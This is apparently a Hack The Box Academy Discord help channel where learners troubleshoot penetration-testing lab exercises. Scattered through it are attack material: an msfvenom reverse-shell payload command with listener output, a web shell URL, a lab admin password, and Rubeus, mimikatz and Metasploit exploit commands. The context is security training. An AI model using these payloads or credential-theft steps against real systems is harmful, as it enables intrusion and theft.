[15:06:46:942] [193240:0002f2e1] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x56070f099860]: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[15:06:46:942] [193240:0002f2e1] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x56070f099860]: CONNECTION_STATE_NLA status STATE_RUN_FAILED [-1]
[15:06:46:942] [193240:0002f2e1] [ERROR][com.freerdp.core.transport] - [transport_check_fds]: transport_check_fds: transport->ReceiveCallback() - STATE_RUN_FAILED [-1]
specifying the domain does not help
Logon failure typically indicates that the username and/or password is incorrect
RDP to xxxx (ACADEMY-ADTRUST-CFSQL01) with user "Administrator" and password "HTB_@cademy_adm!"
I mean I can't do much more, this is far from the first time that I've had issues with RDP on this path. It's getting pretty tiring having to switch VPNs three times before accessing a lab
Reach out to support
Please am new how can I sign up to the academy
Thanks
Well turns out you have to specify the domain in the username parameter (was not required in the previous envs), you might want to update the command supplied in the module material.
xfreerdp3 /v:10.129.x.x /u:Administrator@inlanefreight.ad /p:'HTB_@cademy_adm!' /dynamic-resolution /cert:ignore
Thanks for the support and great lab stability
It's gonna depend
Sometimes it's user@domain, sometimes it's domain/user iirc there's also /domain: for xfreerdp
out of 14 AD path modules that I've completed its the first time it happened
might be worth it to mention it somewhere or apply it everywhere so that people don't waste 20 mins trying to log into the machine
Few things you can do here. I would enumerate MS01 with whatever creds will access it. Nothing super fancy, maybe just localgroups that might be worth enumerating and going from there. Netexec is also very helpful and if you are unfamiliar with it, they have a well written out wiki and I'm sure you can Google some helpful modules and techniques with netexec.
Your post contained spoiler info; alongside that it revealed other info related to the lab
: don't share flags, and info like that
oh dear I'm so sorry, I tried to redact almost everything, did I miss something?
Yes. Your copy/paste of the burp request
sorry then, I thought I deleted enough. Do you maybe have a hint regarding my question, even if I failed to redact correctly
No idea. Could be that it's related to the User Agent
POST /keys.php HTTP/1.1
Host: 83.136.248.49:44095
User-Agent: curl/8.11.1
Connection: keep-alive
Content-Length: 26
key=as found
HTTP/1.1 200 OK
resulting with the *6e response
still no luck, curl also seems to have no other infos.
¯\_(ツ)_/¯
solved it by using -x in curl, send it through BURP, reviewed it and found out, you need some correct headers, see below.
POST /keys.php HTTP/1.1
Host: 83.136.248.49:44095
User-Agent: curl/8.11.1
Accept: */*
Connection: keep-alive
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
key=pssst
Oh yeah I forget that sometimes it forces the application content-type
correct played around and cut it down to at minimum
POST /keys.php HTTP/1.1
Host: 83.136.248.49:44095
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
key=pssst still
Yeah, forgot that bit from the ffuf module, that POST data with php requires that header
Guys hello can anyone give me some tips how to communicate with SQL database have never done it before
hi guys
There's an sqli fundamentals module, and the footprinting and common services modules both give some basics
I am having trouble with DNS Tunneling with Dnscat2 section of Pivoting Tunneling and Port Forwarding module. My issue is I follow the exact instructions after installing the program they tell me to install to start the server and it won't let me it gives me this weird error. I don't think I can post code without revealing anything as its a short section.
I have not completed them and now passing attacking sql
Everything you need to interact has been given to you
It would probably spoil too much for me to post actual code. But I'm running the ruby script it tells me to run against the target host it won't let me.
it starts to run and runs into an error
It helps to provide the error dude
ok sure:
```
<SNIP>
/home/kali/dnscat2/server/libs/dnser.rb:828:in `bind': Cannot assign requested address - bind(2) for "10.129.42.198" port 53 (Errno::EADDRNOTAVAIL)
from /home/kali/dnscat2/server/libs/dnser.rb:828:in `initialize'
from /home/kali/dnscat2/server/tunnel_drivers/driver_dns.rb:251:in `new'
from /home/kali/dnscat2/server/tunnel_drivers/driver_dns.rb:251:in `initialize'
from /home/kali/dnscat2/server/tunnel_drivers/tunnel_drivers.rb:24:in `new'
from /home/kali/dnscat2/server/tunnel_drivers/tunnel_drivers.rb:24:in `start'
from dnscat2.rb:210:in `<main>'
```
I thought I installed it
there's an issue?
with installation? because the install script runs just fine
Address not available
but I can ping the address
Something else is running on port 53
With which database? Here are some examples
MySQL / MariaDB = mysql
MS SQL Server = sqsh
PostgreSQL = psql
For the communicator you need SQL
https://www.w3schools.com/sql/
ok got it but what my web browser? I have nothing else running in the VM except the HTB Academy VPN and my firefox browser
¯\_(ツ)_/¯
should my browser not be running?
then I don't know what else is running
But the error may be more simplistic
Try changing the bind address to your tun0 ip
Yep
ok thanks I'll continue the section now
Hiya, I think the file upload assessment is slightly broken - when using burp it cannot load external assets for the website
Meaning it can't bind to the address
For example, when loading with foxyproxy active, going to burp
As a result, jquery won't load, and that is being used as the event listener for a POST request to trigger the file upload
Which results in me being unable to complete the lab
I've had no issues with the lab
Could be your burp install
It looks like this, so something seems to be going on - not entirely sure how to resolve it
If that was the case, the burp browser would work with no setup, wouldn't it?
I've installed the certificate too (for both browsers I tested on)
Hmm. I mean, I'm using it on my host platform right now
I'll try pwnbox rq
Pwnbox works, so it must be me. Odd
I must've done something wrong with the certificate, I guess
I get the server running on my attack box but I get errors on the Windows machine when I try connecting back to the DNS server I started. This is for DNS Tunneling with Dnscat2 section of pivoting tunneling and port forwarding:
```
<SNIP>
Start-Dnscat2EncInit : Failed to negotiate encryption. Ensure your dnscat2 server is set up correctly.
At C:\Users\htb-student\Desktop\dnscat2-powershell\dnscat2.ps1:1462 char:20
+ $Session = Start-Dnscat2EncInit $Session $False
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Start-Dnscat2EncInit
<SNIP>
Start-Dnscat2EncInit : Failed to negotiate encryption. Ensure your dnscat2 server is set up correctly.
At C:\Users\htb-student\Desktop\dnscat2-powershell\dnscat2.ps1:1462 char:20
+ $Session = Start-Dnscat2EncInit $Session $False
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Start-Dnscat2EncInit
```
I posted the errors. I snipped out the commands to avoid spoilers. This is what I'm running on powershell on the local machine. I also tried similar commands on the local attack box and that won't work either.
this is for the step after I have started the DNS server and want to connect back to it.
Looks like a server side issue, you using the secret the server provided?
maybe. I'm gonna try this again later. I think once I'm well-rested this will be much easier.
I'm gonna try again tonight or tomorrow.
its probably something I will figure out once I am in a better state of mind. I just exercised so.
I'll try moving my brain to something else for the time being.
Where would be the best place to ask for clarification on the TOS when it comes to publicly discussing Academy content?
What do you need clarity on
Modules above tier 0 are 'paid content' so discussing specifics would be against ToS; obviously sharing answers directly is also against ToS
I have something in mind that involves a general description of a (not Tier 0) module's topic and the name of a used tool, no screenshots, solutions, walkthroughs or anything of that sort. Just want to compare the speed of PwnBox and KaliVM for a ffuf-fuzz, not gonna include the actual command, mostly just the final time stamp on how fast each of them are.
This gets fuzzy, because lots of things can impact those types of scans
yeah, it's not like a real benchmarking thing, just like a brain dump
I.e. your personal internet connection speed, isp, firewall, etc...
absolutely, that's kind of where I'm going with this, just have this example from Academy handy, might have to dig something out of a Tier 0 module if TOS is not clear on that
At the risk of sounding a bit harsh: what's the point. I.e. what's the reason you feel you need to ask/talk about it
Understandable. Well, I'm just trying to put my thought process out there.
But if it's for a blog, you'd have to use something from a t0 module
Roger that
yeah I have that open actually ^^
(I sometimes wonder that even for writeups. Does the world really need my clunky writeup for a machine if there's also ippsec 🥲)
Consider if you have to reference the module, and you needing to refer to specifics within it, as a pseudo-writeup
More people doing writeups is a good thing. Different perspectives on the same issue
Well you need the writeup more than anyone. You can understand the lab in a deeper level that way
Lol yeah, same reason for my ffuf comparison. It's more to put those thoughts together for my own understanding. Not gonna make any revolutionary observations ^^
Also i appreciate you not taking my "what's the point" question as a dig at you
Just a general: if you're asking to do the thing, why
If you do need clarification on stuff: customerops@hackthebox.com <- support email
(It's preferred to open the ticket via the support buttons though)
Alrighty, thanks for y'alls input, I got some more clarity.
I'm just getting started (blog and stuff), I admit, it's a bit daunting and rough to get into if you're somewhat new to that industry
@pseudo pulsar this isn't a hacker4hire server
any fix for this
Google: "sliver null pointer armory"
https://github.com/BishopFox/sliver/issues/1614
it worked fine on my second laptop the problem was because i had old sliver on this vm
looks like it since the issue looks like it was resolved and is over a year old
i dont usually post here but I feel as if it's a necessity
so it would appear as if 3389 is closed on the skills assessment for pivoting but it should be open as 53 is the only other port open
Making this module next to impossible with the ports I have been given
The last pivot?
Yeah then, there should be I think but i don't think it was needed
I did it a few times and rdp only appeared a couple times
Yes
This is news to me because all the ports I can see are 53 and a closed rdp port
There are some other ways to get remote access
Hi all, I'm in Privilege Escalation Module in Introduction and having trouble escalating to User2. I found that User1 has sudo privileges for bin/bash. I've found the flag.txt file in /home/user2, but obviously don't have permissions to see it as User1. I've tried running multiple sudo commands with syntax sudo -u User2, including su'ing to user2, cat the file, create directory for .ssh under user2, and a bunch of others, but they all come back saying I don't have permissions, which I'm confused about since have sudo permissions for bin/bash for user2. Also, since I have sudo access to bash, I checked gtfobins for what I can do with that, and see I can do a reverse shell, file download etc. I tried opening a nc on the attacker box and then running the commands to do a file download on the box I'm trying to crack including setting the RHOST and RPORT and the LFILE and then running the bash command but nothing seems to happen. It also says that if bash is allowed to run as sudo, I should be able to access the file system, but having trouble figuring out how. Also, I found that the Linux system is a Ubuntu 20.04.1 LTS with sudo version 1.8.31 which is vulnerable to CVE 2021-3156, which I downloaded to my attacker box and built it and then copied to the box I'm attacking, but when I try to run the exploit it says it requires a later version of glibc than what's on there. I downloaded glibc 2.34 which is what it says is required and copied it to the attacked box, but as user1, I can't install it because don't have permissions. Maybe I'm headed down completely wrong path, but could really use some pointers if I'm headed in right direction or completely off. Oh, also tried to create an .ssh directory for user2 so I could create and upload keys, but again, no permissions even using sudo -u user2. One last thing, I did run the linpeas checklist and it found some stuff but sadly no passwords
I just did a full nmap scan and found literally nothing, so you'll have to forgive my skepticism
dm
check the user1 sudo -l permissions again:
(user) /path/to/command means you can execute the /path/to/command as (user) via sudo; by default sudo tries as root, however you can supply it a user option
that's what I think I'm doing but must have something wrong. I'm running command 'sudo -u user2 cat flag.txt' and it tells me that user1 is not allowed to execute cat command
says not allowed to execute that command as user2, I mean
correct you're not allowed to use cat as user2
sudo -l explicitly tells you what binary you can run as user2 with sudo
which is /bin/bash, but I guess I don't know what I can do with that is the issue, to be honest.

you're like 🤏 this close
sudo -u [username] /path/to/binary <whatever other arguments here, if any>; bash is like cmd or powershell, when you run powershell or cmd from themselves, you start a new process with that binary and whatever other arguments you may have passed through
if you pass the -c argument -> it runs a subprocess that runs the command supplied, then exits back to your original shell
$$ is bash for [current process id]
run that; then just run /bin/bash then run it again, and note the change
congrats: you started a new shell process
and not working : (
thanks Marcie, that helps a ton..I should be able to get it from that..thanks!
glad to see someone else get their answer
sorry vader i'm not at my notes to help you; trying not to get carried away today, virtual job fair tomorrow so gotta be up early-ish
Did you already reset the env?
this isn't a hacker4hire server and i suggest you not attempt to ping @ everyone like a petulant child
i got my pivot working
Don't do things for the world, do it for yourself. You'd be surprised at how much more you pick up when you try to blog about it.
Aw, thank you! yeah, I'll get over it and put something together. Learning by doing, eh?
Can someone explain to me why "username-anarchy" is used with CME in the "Password Cracking" module. Because when playing around i realised CME doesnt even confirm if a username exists, unless the correct password is also used with it
The status message is always "STATUS_LOGON_FAILURE", even if the username doesnt exist
alr
Because it still has a chance to get the right username and log you in if you do a simple password spray and not a brute for both user and pass
So is username-anarchy used to "generate ideas of usernames" rather than allow automating the process?
if you read the surrounding context to username-anarchy; it explains exactly what it's for
Its an automation of the username generation customised to a specific name
the module clear-cut explains this ^
Yeah I know why its exists, but i thought you could automate it with bash for purely validating usernames. but i guess you must also automate password spraying with the username so it will take longer
Could use a little nudge on Active Directory Assessment part 2. Do I need to use the PrintSpoofer exploit on the MSSQL server? Having an awful time trying to upload files via xp_commandshell
Yeah it's kinda annoying but you should be fine if your port forwards are correct
Thank you for responding @tubbylattice! Im trying to upload the files directly from the jump box on the network
I tried a few different tools but didn't seem to have any write access. Jumpbox would show 200 ok, but no files would be written to the victim
In any case, am I on the right track by trying to use printspooler?
Full context: I got reverse shell via xp commandshell
Is it just me or is the connection to both the target machines and pwnboxes horrible ?
you shouldn't be using the pwnbox if you're using your own vm
then don't run the pwnbox; it uses the same connection file, which assigns the same internal network IP... I hope you see where that goes wrong from here
hi m stuck on WordPress hacking module skill assessment last question + 1 Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.
what part?
last question of skill assessments
Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.
i change 404.php and add shell here but when i access it it gave me nothing
/wp-content/themes/theme/404.php?cmd=ls
Ever hear the term: Don't reinvent the wheel
why automate something when the automation already exists
Hi,
Module: Windows Privilege Escalation
Section: Pillaging
Question: Find out Grace's password
I have tried the for loop with the fasttrack.txt wordlist. But it doesn't match. I also tried rockyou.txt for a while before giving up :(. I don't like these kind of questions where it relies on bruteforce and me selecting the right word list
The first and second question are interconnected, and within the section it is shown how you can recover the plaintext password without bruteforcing
Hi, Is it that I cannot use Academy VPN connection file "academy-regular.ovpn" to connect to the lab Machines?
Gotta use the lab vpns
Learn how to connect to the VPN and access Machines on HTB Labs.
Thanks for the nudge, looks like I may have to just reset the box and try again ...
thanks
No its not that mate, I thought i could use the usernames generated by "username-anarchy" to spray with in CME to see if i can get valid usernames. But i discovered the error message was the same regardless if the user is correct or incorrect
So I modified my bash script to also attempt password cracking with all the users i put in the table. Its nothing in regards to the module, just creative thinking
Discovering users either need kerbrute or one user with ldap access
yeah, I just had an idea and was trying to play with it. Nothing wrong with having lil fun
See: AD enum and Attacks module
Just dont have too much fun and confuse yourself 
Well making mistakes and trying to see the limits of a tool is the fastest way to learn
but yeah lol dw
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hi
Can someone explain to me how to solve HTTP Response Splitting? I found XSS, but I have no idea how to steal the admin cookie and how to deliver it to him
is there a way to get rid of the maintenance notification? it makes the integrated terminal buttons inaccessible?
and that cube that is for reporting stuff?
because i use the website sort of zoomed in and it takes up so much space
I used netexec too in order to dump the SAM database, but same problem (lack of privilege)
hi @everyone does anyone know where i can get help with an issue that im battling?? its about WPA/WPA2 wifi networks "PEAP relay attack" thnx!
Anyone else having performance issues on password attack module?
Without revealing much of the answer, I got onto the ||svc_workstations|| user via SSH, but cannot seem to sudo su to root from there.. getting the following error
hi
can someone help me
i have a problem when i was doing cross site scripting in htb
so i was at topic session hijacking
and i do everything got a cookie
but the problem is
that in login page in storage there is no options about cookies
maybe i will try just restart a target
same problem
in the developer tools you need to click the + sign at the top right hand side, if youre using firefox it goes through the steps in the module.
thank you I was not paying attention so much
i think i will pay attention more
no problem! Took me a hot minute to get it
You can stay logged in and simply change the session cookie and refresh
Ping fail!
Hey, is anyone able to give me some suggestions regarding how to improve RDP performance. Im completing the Windows Attack and defense module, specifically the 'PKI - ESC1' exercise. Having to RDP to the Kali machine and then RDP to the windows machine makes the exercise impossible due to lag.
I am connecting using the VPN (tried both UDP and TCP) with a local version of PARROTOS (not using a VM).
Based in Australia, so im guessing that it may just be a matter of server location.
You're going in the right direction. You can DM.
Also refrain from sharing content that can be considered spoilers, i.e., privileges of users.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@whole olive ^
Thank you very much
anyone faced issues in using psexec with proxychains in the Sliver module?
what kind of issues
can somebody help me with the windows attacks & defense module.
i am trying to perform a kerberosting attack
i am able to connect to the windows machine using RDP but when i try to do the same with the kali linux VM it wont work. Should i be doing anything differently?
not connecting at all
it keeps hanging at "uploading file"
also i have a question of smth im not fully understanding in it, may i DM u?
go for it
I have a question regarding DNS. I looked up and read that most request made to a DNS is still in plaintext. How is that not an issue? I mean you can just see the activity of the requests made but still. Isn't it basically your entire browsing history being tracked if someone know how to snoop in?
the request is generally "does x exist" not the actual full body of the text/request
So it just shows if I am contacting the particular site?
yes; it would be a PITA if the request to say "does x exist" would need to be encrypted/decrypted
considering it would need a massive overhaul of existing infrastructure to actually implement
So VPNS and encrypted DNS mask those requests too right?
no
at least not entirely
VPNs shift the point of trust
and encrypted DNS only works if the DNS server you're contacting are utilizing DNS over TLS
Clears a lot of things. Thanks a lot
have a problem when I was learning metasploit in htb
so when i was doing section payloads I need to use apache druid exploit and when i use it i got this
```
msf6 exploit(linux/http/apache_druid_js_rce) > exploit
[*] Started reverse TCP handler on PWNIP:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/apache_druid_js_rce) >
```
Hi! I have a question about the module "Constrained Delegation Overview & Attacking from Windows"
The module tells without any further explanation that we can use HTTP as the alternative service:
.\rubeus.exe ... /altservice:HTTP
It also links a microsoft page with other common service names. I tried a couple of them (fax, cifs, replication) and none worked.
Can anyone tell me how can I see that the HTTP can be abused or present at all?
The error message is pretty clear. Something else is already running on your port 8080 and metasploit can't use it to host the actual payload. Either stop whatever is running on that port or change SRVPORT to another value.
wow i forget that burpsuite is working
thank you
hello friends
https://academy.hackthebox.com/module/112/section/1246
in the MSSQL section of the Footprinting module, i'm confused for the question here:
Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.
i connected using mssqlclient.py but i'm confused by the question. what am i looking for exactly
The name of the database that is not there by default (the section has a list)
i was putting in the name of the Owner... instead of the name of the database. that was my mistake
it happens
Hello,
i have been working on DACLII skill assessment question "Abuse taino's rights to compromise SDE01 and read the flag located at C:\Users\Administrator\Desktop\flag.txt". I have found the right path but got stuck on the command for the impersonation ".\Rubeus.exe s4u /domain:inlanefreight.local /user:DB2000 /rc4:[Missing] /impersonateuser:administrator /msdsspn:"MSSQLSvc/db2000" /nowrap" i can't get the RC4 for DB2000. Would be nice if anyone could give a hint please.
Hello, I need some help. I'm stuck in this part of the section, Active Directory Enumeration & Attacks (Attacking Domain Trusts - Child -> Parent Trusts - from Linux) with this question "Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer." I can't find the user's bross! I tried on windows but nothing! Please any idea and hints will help me.
What is the question?
What is the username of the ftp user you find via brute-forcing? ( i scanned the target ip but the ftp port was closed on it ....so is it possible to brute-force)
Is this an ip:port?
If so: the only scope is the port given, and that will be ftp
ip:port is given i scanned the ip:port the port is on ssh
Ah I see the problem
The assessments are directly tied
A leads to B
Ssh in from the skill assessment 1, and perform the enumeration as detailed in one of the sections in the module
@steel arch ; this is your launch platform
After that you'd run the internal scan for services
i have finished the first one
The blurb tells you what you need to do first then
Hello, I need some help. I'm stuck in this part of the section, Active Directory Enumeration & Attacks (Attacking Domain Trusts - Child -> Parent Trusts - from Linux) with this question "Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer." I can't find the user's bross! I tried on windows but nothing! Please any idea and hints will help me.
Still 2 years after not fixed...
Hello I need help
I'm in the cracking in to htb module
2 course
in skills assessment
I dont get the same privileges. help please
```
msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.15.147 LPORT=9443 -f war -o maliciou.war
Payload size: 6210 bytes
Final size of war file: 6210 bytes
Saved as: maliciou.war
┌─[us-academy-2]─[10.10.15.147]─[htb-ac-1719859@htb-lpaf7th7l0]─[~]
└──╼ [★]$ nc -lvnp 9443
listening on [any] 9443 ...
connect to [10.10.15.147] from (UNKNOWN) [10.129.22.85] 41214
whoami
java.lang.OutOfMemoryError: Java heap space┌─[us-academy-2]─[10.10.15.147]─[htb-ac-1719859@htb-lpaf7th7l0]─[~]
└──╼ [★]$ nc -lvnp 9443
listening on [any] 9443 ...
connect to [10.10.15.147] from (UNKNOWN) [10.129.22.85] 41254
whoami
java.lang.OutOfMemoryError: Java heap space┌─[us-academy-2]─[10.10.15.147]─[htb-ac-1719859@htb-lpaf7th7l0]─[~]
└──╼ [★]$ nc -lvnp 9443
listening on [any] 9443 ...
connect to [10.10.15.147] from (UNKNOWN) [10.129.91.194] 36956
id
ls
java.lang.OutOfMemoryError: Java heap space
```
restart machine same error.
https://academy.hackthebox.com/module/51/section/480
why connection breaks each time.
Can someone explain me the price differences between subscriptions and only cubes?
If you want to buy single modules cubes are ok if you want to unlock all modules annual subscription is ok if you want to complete several paths sometimes other methods of subscriptions are worth being considered.
There are monthly and annual modules
I am asking, because if I get a monthly subscription, I get modules, cubes and extras
The cubes are permanent, right? Until I waste them
And the subscription is cheaper, while the cubes themselves are more expensive
There are different types of subscriptions. One will unlock modules (I believe up to tier 2) while other subscriptions just give you cubes.
If you don't get a subscription that auto-unlocks modules then you'll need to unlock them with cubes instead.
Im talking about the gold subscription
Oh wait so annual and monthly are different in terms of access?
Or they are the same
There is some specific abuse before you get to this point that you can perform. I wouldn't rely solely on BH results and ensure you are enumerating things thoroughly. Think back to the various methods you can use to obtain an NT hash and see if any work with what you have enumerated. I know that's super vague, so if you still can't seem to get going in the right direction, you can DM.
I am at win enum section in pentest in a nutshell module. These are the privileges I have to have. Am I missing something? I used the same credentials (john, supersecurepass123)
Did you open as admin?
ofc not, why would I, am superuser loool... i am supersarcastic noob
but now, when I do as admin I get:
Hi.
Any tips finding the flag.txt in Login Brute Forcing PT2, I found the user and I'm inside the SSH server.
But no flag to be found, unless I'm drunk.
The user I'm finding T**, is a ftp user, but no FTP port open.
Unless it's really high up
I suggest revisiting the section that is similar to your situation. It's covered.
But I'm already inside the SSH, unsure what section shows me how to find the flag.txt the smartest. Already ran though the files and folders
I'm sure one of the sections covers local stuff.
Okay I see where you are trying to point me maybe! I'll have a look thanks!
If you are still stuck after trying some things out, you can DM.
I'll read the entire login brute force chapters again for hints
Your tips pointed me the right direction, finished it
thanks man!
Np. Be sure to add that stuff to your notes.
Already expanded my SSH notes to make sure I don't miss!
Question! When I'm running medusa inside an SSH, does it require the target to have it, or does it use my local instance?
Yeah it's not something that is going to generally be installed on a target, unless you pwn a pentest rig or it's just on it. Enumeration is always key throughout your process.
So on targets in this world, but real world not gotcha.
Would be nice to leverage local instance to do it
Anything is possible. Like I said enumerate and see what type of living off the land you can do.
Gotta improve that part next for sure!
There are other ways you could do it, but that's outside the scope of the module.
Any module you can recommend ? I'm doing the Basic Toolset currently
The path that is, so all the modules in it
hey guys if someone solved white box attack module is there problem in the bot in Client-Side Prototype Pollution
hello im having trouble with:
https://academy.hackthebox.com/module/136/section/1288
File Upload Attacks - Blacklist Filters
Try to find an extension that is not blacklisted and can execute PHP code on the web server, and use it to read "/flag.txt"
I can get extensions that upload successfully but when I view their corresponding page my php is only reflected on the page, I am not able to execute commands via url.
I am stuck on the "Brute-Forcing 2FA Codes" section from the Broken authentication module. It seems to accept every 2FA code when I execute the ffuf command (and I made sure I was using the correct PHPSSID cookie from the otp page of my IP address)
Use an extension list to fuzz for extensions that give different error messages
Then you can also fuzz the file upload and the command execution checking
Hi everyone. I'm having trouble with the Pivoting, Tunneling, and Port Forwarding Meterpreter Tunneling & Port Forwarding lab 2nd question. I've followed the instructions, but metasploit never recognize my session. I tried reaching helpdesk, but they say it's working. I can't use autoroute because metasploit says that there is no session after exploiting the initial ubuntu machine no matter what I attempt to do.
you ran sessions -i 1?
yes. It continues to show no active sessions.
Did you exit the shell session you popped or background it
:) (sounds like you closed it)
Hi. Yes. I tried it four times and still the same issue
If you closed it -> you won't see the session... because it closed
I can clearly see I have a meterpreter session from the ubuntu box, but metasploit doesn't see it as an active session I'm in
That only works if the exploit worked on first try/this was the first session
sessions -l iirc to list sessions
Is there a way to drop screenshots?
Also are you running a different instance of metasploit?
If so: that's your issue
The new process can't see your other one
Just 1 instance of metasploit, but I'll try it again
What do you mean you can "clearly see;" also for embed perms you need to follow the instructions in #welcome and link your htb account
If I could add a screenshot it will better explain. I'm just going to go over the lab again
Well i told you how to be able to share screenshots
It's linked to the embed permission
I don't think you can keep that session in metasploit unless you configure some other stuff
Has to be from the same session
I'll double back and do it that way
didn't marcielee say that?
gonna ask this again - does anyone still have an account logged in to academy without the use of sso? I'm also looking for someone who has an account that logged in to academy via sso that had earlier logged in via the old login page, since I probably won't find the first
I did
SSO is tied to the login, they aren't separate - and haven't been for some time
All accounts using the old method were migrated to an SSO Account
you'd be surprised
I'm currently at where setup socks proxy module in metasploit and started the proxy server. I opened another msfconsole just to see if it shows a session and it doesn't.
If you have a question regarding this, reach out to support
Because the new msfconsole won't be able to see it
As i stated earlier
support would probably not know, and if they did, they might patch it
?? Well I'm not sure what your question is tbqh
Hang on. Weird it works now. My F-up. Thanks for all your help!
Here's where I told you this earlier
I just can't see the difference...I'm trying to fuzz a username with ffuf, and what looks like the exact same command to me (aside from the different location of the wordlist), it works only on PwnBox, not on Kali. PwnBox spits out the desired username after a few iterations, Kali seems to show me valid response statuses for literally every name in the list?
It's gotta be a typo somewhere, and I'm just not seeing it?
Jeez, that took me way too long. "www-forum-urlencoded" instead of form on Kali
Nvm, I'm all good
You can DM if you are still stuck.
Although, while I'm on that topic; when enumerating with PwnBox, I get all those "Progress" outputs in the terminal, which make the actual results kinda hard to see. Kali shows me just the found usernames.
Again, seemingly identical command, why the different behavior of ffuf?
it's probably some shell thing
Full screen
Only had that on whatever that parrot terminal is
you can probably fix it with stty
gonna look into that, thanks!
do a stty -a
that might take me a minute
Hello, I need some help. I'm stuck in this part of the section, Active Directory Enumeration & Attacks (Attacking Domain Trusts - Child -> Parent Trusts - from Linux) with this question "Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer." I can't find the user's bross! I tried on windows but nothing! Please any idea and hints will help me.
Are you connecting to the right domain?
it looks fine
shell stuff is kind of magic though, so it's probably easier to just use a full screen
let me check again
yeah, I can absolutely live with that
LOGISTICS.INLANEFREIGHT.LOCAL
Dm the command
when you see it loooooooooool, guess the module
@whole olive you have already been given a URL that points you to the resource
http verb one? web attacks one?
Oh ok
oh ok
Hi, it's my first post so i hope in correct section.
I have to do this task
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths ("https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.
I have problem or i am doing something wrong.
I am trying use curl -s [address] > site.html and nothing. I had to try ping but it failed.
I'm going at this the wrong way or what?
are you able to curl other sites? try curl google.com
I will try tomorrow. I reached my limit Pwnbox today.
Off Topic: what is better (buy cheap /use old) laptop and install linux or VM with Linux?
Hey, I'm doing this password mutations in password attacks and the ssh bruteforce is taking forever
Hey
Pwnbox not opening. Can anyone help?
can i DM anyone regarding Sliver module Skill Assessment?
any good open source note ?
like this https://docs.h4rithd.com/
so i can make my own modification on it . (i use hacktricks note but it not comparable with obsidian)
Sure
hey, i cant access the lab for CRUD API in Web Requests module, anyone can help?
I have been using cherry tree
can somebody tell me what the response here should be?
its from https://academy.hackthebox.com/module/80/section/767
i tried: 2FA, OTP, reset tokens, tokens
nothing
The answer is in the question itself.
You can here or you can DM.
It all depends on your current laptop. If it's only 6 RAM or so then running VM will be painful
ah right didnt see that
Got the same Issue for over 2 hours, who can help me with it, please?
EDIT: Had an UDP connection, changed it to TCP and set to Modem and it worked
Yeah... Issues like that can be really annoying. You think it's you, spend two hours troubleshooting and then realize it was an error with the box.
Had a similar issue the other day. But, I learned some new things in the process, while frantically trying to fix the problem (which I ultimately solved by just resetting the target)
If something really seems like it should work, but it mysteriously doesn't, maybe you should just restart the target and take a bathroom break.
Get a session cookie through a valid login, and then use the cURL cookie to search for the flag using a JSON POST request to '/search.php ' I received the cookies and made json post requests with the found cookies.. but I can't find the flag.
Where is my mistake?
It would be nice to include which module/section you are doing in your message
Cracking into Hack the Box
have you specified Content-Type? have you included -d flag in your request? also double check the format of provided cookies (it should be -b 'PHPSESSID=1234abc').
- better not to share full command
- you can't see the flag if you search for it?
I can't find the flag
I mean when you replace "london" with "flag" you can't see it?
is it really necessary to change?)
Yes.
thank you, I think it's not like that, but it's simple, I'm an idiot, thank you)
np but delete the message you posted above which included the full command
hi
i am stuck in Post-Exploitation part in Attacking Enterprise Networks modules can anybody give me a hint in it
you mean "Escalate privileges on the target host..." part? it's really simple linux privesc, something with sudo command
awesome! you got it, the web attacks one lol
i mean this part
which question? 1 or 2nd?
1
On DC01 you can find another subnet. Do ping sweep against it, set up routing, and then enumerate DC01 further to find something that will help you to connect to a host on a new subnet.
the problem that i can not reach DC01 i tried chisel but it did not work
not sure here. maybe try ligolo. double check your /etc/proxychains config and all other settings
i will check it out, thank you
hlo
im casually having a problem
password attacks, pass the hash
the question says Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?
however
when using this command (i get:) Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?
wait bruh
```
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
```
i tried running cmd as admin but same
any ideah
im stuck on this since the morning
Did you run mimikatz on an elevated session?
If so, did you run token::elevate and privilege::debug before running other mimikatz command?
elevated session = running cmd as admin riiiight ?
Yes
i didnt do token::elevate and privilege::debug tho
Give it a try
aha so this is for mimikatz to benefit from the elevated session
This is to use a SYSTEM token and to be able to read LSASS
I thought elevate was for the sam
privilege::backup
privilege::debug grants debug rights
So you can enable SeBackupPrivilege
